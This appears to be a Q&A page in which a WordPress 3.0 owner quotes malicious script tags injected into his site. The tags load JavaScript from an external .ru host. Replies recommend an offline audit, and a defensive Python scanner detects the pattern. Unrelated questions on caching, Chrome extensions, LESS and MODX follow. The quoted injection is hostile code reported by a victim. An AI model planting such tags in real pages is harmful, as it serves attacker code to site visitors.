WordPress 3.0 security? - security

I have a website with WordPress 3.0.
I noticed that /wp-admin displays the following error today.
Warning: Cannot modify header information - headers already sent by (output started at /www/sites/..com/files/html/wp-includes/default-constants.php:299) in /www/sites/..com/files/html/wp-includes/pluggable.php on line 890
I used IE's view source. I found the following code.
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b-->
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><br />
It looks like my website has been hacked.
I enabled the cforms plugin only.
Any ideas or suggestions?

Pull the server offline, then run a security audit on it and any client that can upload content to it. Then change all your passwords.
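
One way to do the file-level part of the audit suggested above, as an added example that is not from the original thread: it searches a site's files for the pattern shown in the question's view-source output, an external script tag followed by a 32-hex-digit HTML comment. The sample tree, domain and marker value are constructed for the demonstration.

```python
import re
import tempfile
from pathlib import Path

# Pattern taken from the view-source output in the question: an external
# <script src=...> tag immediately followed by a 32-hex-digit HTML comment.
INJECTION = re.compile(
    rb'<script[^>]*\bsrc=["\'](https?://[^"\']+)["\'][^>]*>\s*</script>\s*'
    rb'<!--([0-9a-f]{32})-->',
    re.IGNORECASE,
)
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}


def scan_tree(root):
    """Return sorted (relative path, line number, script URL, marker) hits."""
    root = Path(root)
    hits = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        data = path.read_bytes()
        for m in INJECTION.finditer(data):
            line = data.count(b"\n", 0, m.start()) + 1
            hits.append((path.relative_to(root).as_posix(), line,
                         m.group(1).decode("ascii", "replace"),
                         m.group(2).decode("ascii")))
    return sorted(hits)


def demo():
    """Build a constructed two-file tree and scan it."""
    tag = (b'<script type="text/javascript" '
           b'src="http://injected.example/x.js"></script>\n'
           b'<!--0123456789abcdef0123456789abcdef-->')  # constructed marker
    with tempfile.TemporaryDirectory() as tmp:
        inc = Path(tmp, "wp-includes")
        inc.mkdir()
        # Clean file: a local script reference and no marker comment.
        (inc / "clean.php").write_bytes(
            b'<?php\necho \'<script src="/wp-includes/js/a.js"></script>\';\n')
        # Tampered file: the tag is appended after the closing PHP tag.
        (inc / "default-constants.php").write_bytes(
            b"<?php\ndefine('X', 1);\n?>\n" + tag + b"\n")
        return scan_tree(tmp)


if __name__ == "__main__":
    for hit in demo():
        print(*hit, sep="\t")
```

Run `scan_tree` against an offline copy of the web root; every hit names a file to compare against a clean copy of the same WordPress release.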

Related

javascript latest file not download in IE without cache clear

I have made some changes to JavaScript files. I deployed them to my server and reset IIS.
I tried to launch from IE, but the latest modified file changes do not appear. It reads the old file.
If I clear the cache, it works. How can I get the latest files without clearing the cache?
Please give guidance to resolve this issue.
Thanks.
Try to get the value of the current time and add it to the script file URL as a version id:
<html>
<head>
<script src='http://example.com/js/main.js?ver=<%=DateTime.Now.Ticks%>'
type='text/javascript'></script>
</head>
<body>
</body>
</html>
You should check the cache control options in your IIS.
To flush the cache you can use some variables in the JS links.
For example:
http://domain.com/js/main.js
and
http://domain.com/js/main.js?ver=1
download the same file, but the second link downloads the file as a new resource.

How to run content script code on an HTML file locally hosted by Google Chrome Extension? [duplicate]

I want to run a content script on an iframe with a chrome-extension:// URL. I added a line to my manifest.json that I copied out of the documentation http://code.google.com/chrome/extensions/match_patterns.html
chrome-extension://*/*
But when I reload my extension I get an alert:
Could not load extension from '/work/sirius/extension'.
Invalid value for 'content_scripts[2].matches[0]': Invalid scheme.
Any idea how to get this to work?
No. Only ftp:, file:, http: and https: can be matched by a content script declaration.
Invalid URL patterns at any of the matches and exclude_matches fields are rejected (generating an error when trying to load the extension).
Invalid patterns at the permissions option in the manifest file are ignored.
If you want to run a script on a tab from your extension, use chrome.extension.getViews in your background script.
Even better, design your extension's pages such that they effectively communicate with each other (example).
I'm having the exact same problem, look at the API http://code.google.com/chrome/extensions/match_patterns.html it says clearly that they accept chrome-extension://*/* yet they don't.
They need to update the API so as not to confuse people.
It seems that Chrome authors have silently removed the ability for content scripts to be injected into chrome-extension: pages. Documentation still says that it works and even contains examples with chrome-extension: scheme but actually it doesn't work. So now only http:, https: and ftp: work "from the box" and file: can work if user of your extension has enabled this on Extensions (chrome://extensions/) page.
Update: now documentation referred above is updated and says nothing about ability to inject content scripts to chrome-extension: pages.
You can inject JS into your iframe HTML (chrome-extension: pages) without declaring it in manifest.json. The injected JS can access Chrome APIs directly.
iframe.html:
<!DOCTYPE html>
<html>
<head>
...
</head>
<body>
...
</body>
<script src="iframe.js"></script>
</html>
iframe.js:
console.log(chrome); // {loadTimes: ƒ, csi: ƒ, …}

Using LESS in a Chrome Extension

I'm attempting to use LESS in a tab created via a Chrome extension (chrome.tabs.create), but I'm getting a cross domain error ("NETWORK_ERR: XMLHttpRequest Exception 101"), referring to the LESS JavaScript file. I'm not clear on how to set up the permissions. Adding the LESS JavaScript file to "web_accessible_resources" doesn't seem to help. All other files, such as css and js files load fine. It seems I only receive this error from within the less source. Any ideas?
To explain my setup a bit more, the LESS JavaScript file and .less file are loaded in an HTML file something like this:
<!DOCTYPE html>
<html>
<head>
<link rel="stylesheet/less" href="static/css/main.less">
<script src="/static/js/jquery-1.8.2.min.js"></script>
</head>
<body>
Whatever...
</body>
</html>
This html file is loaded in background.js like this:
chrome.browserAction.onClicked.addListener(function() {
chrome.tabs.create({url: 'mypage.html'})
});
The manifest file has permissions for "tabs" and "all urls", and loads background.js.
I'm not sure where you include the client-side less.js compiler. See also: http://lesscss.org/#client-side-usage. Less.js is client-side JavaScript. It seems that less.js loads from another URL (domain) than your main.less file. This can be fixed by enabling CORS, see: http://enable-cors.org/. On the domain where home.less has been installed, the server should send an Access-Control-Allow-Origin: * header.
less.js loads the less files with XMLHttpRequest, which supports CORS in most modern browsers; see http://caniuse.com/#search=cors. More details can be found at http://www.html5rocks.com/en/tutorials/cors/
For development, use less.js from a local folder.
<link rel="stylesheet/less" type="text/css" href="styles.less" />
<script src="less.js" type="text/javascript"></script>
For release, use any less compiler like lessc.

Modx Front End not Showing Up

I installed MODX Revolution and everything is working fine in the manager, except the front end: when I browse to the local website nothing shows up, just a
<html>
<head>
<title>MODX Revolution - Home</title>
<base href="http://evosoccer.loc/EvoSoccer/" />
</head>
<body>
</body>
</html>
I checked the error log in /cache/logs and the log page from the manager and it has zero records. How do I troubleshoot this?
--
Regards.
Yehia
You have no template or content installed. By default a MODX installation is completely empty.
You can install a demo site from the package management if you just wanted to kick the tires. Otherwise, in the resource manager just place some content in the home template. Then you should see something.
-sean
